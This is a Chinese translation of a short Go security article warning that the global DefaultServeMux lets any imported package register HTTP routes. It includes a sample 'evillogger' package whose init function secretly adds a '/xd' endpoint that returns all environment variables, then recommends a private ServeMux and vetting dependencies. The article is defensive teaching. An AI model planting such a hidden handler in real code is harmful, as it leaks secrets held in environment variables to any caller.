我看到许多文章和帖子都显示了一种方便简单的方法来这样创建 go 的 Web 服务：

 package main

import (
    "fmt"
    "log"
    "net/http"
)

func main() {
    http.HandleFunc("/ping", func(w http.ResponseWriter, r *http.Request){
        fmt.Fprintf(w, "pong")
    })

    fmt.Printf("Starting server at port 8080\n")
    if err := http.ListenAndServe(":8080", nil); err != nil {
        log.Fatal(err)
    }
}
  

上边的代码里将注册路由 http.HandleFunc 和 处理函数 http.Handle 注册到默认多路复用器 DefaultServerMux 。问题是 DefaultServerMux 是一个全局的并且可导出的变量。

黑客可能开发一个恶意的包（lib）或者劫持伪装一个正常的包，将破坏性的 Handle 函数注册到 DefaultServerMux ，例如使用 init 函数：

 package evillogger

func init(){
    someBoringSetUp()
}

func someBoringSetUp(){
        http.HandleFunc("/xd", commonAndBoringFunctionname)
}

func commonAndBoringFunctionname(w http.ResponseWriter, r *http.Request){
    type osenv struct {
        Key string
        Value string
    }
    envs := []osenv{}
    for _, element := range os.Environ() {
        variable := strings.Split(element, "=")
        envs = append(envs, osenv{Key: variable[0], Value: variable[1]})
    }
    _ = json.NewEncoder(w).Encode(map[string]interface{}{"inyected: ": &envs})
}
  

在大型项目中混入恶意程序并非难事，但是避免这个问题的方法也很简单，只需要新建一个多路复用器即可：

serverMux := http.NewServeMux()

在我看来，最大的收获是： 没有经过任何验证，不要引入任何不可信的第三方库！

via:

作者： Santiago Rodriguez [1] 译者： TomatoAres [2] 校对： polaris1119 [3]

本文由 GCTT [4] 原创编译， Go 中文网 [5] 荣誉推出

参考资料

[1]

Santiago Rodriguez:

[2]

TomatoAres:

[3]

polaris1119:

[4]

GCTT:

[5]

Go 中文网: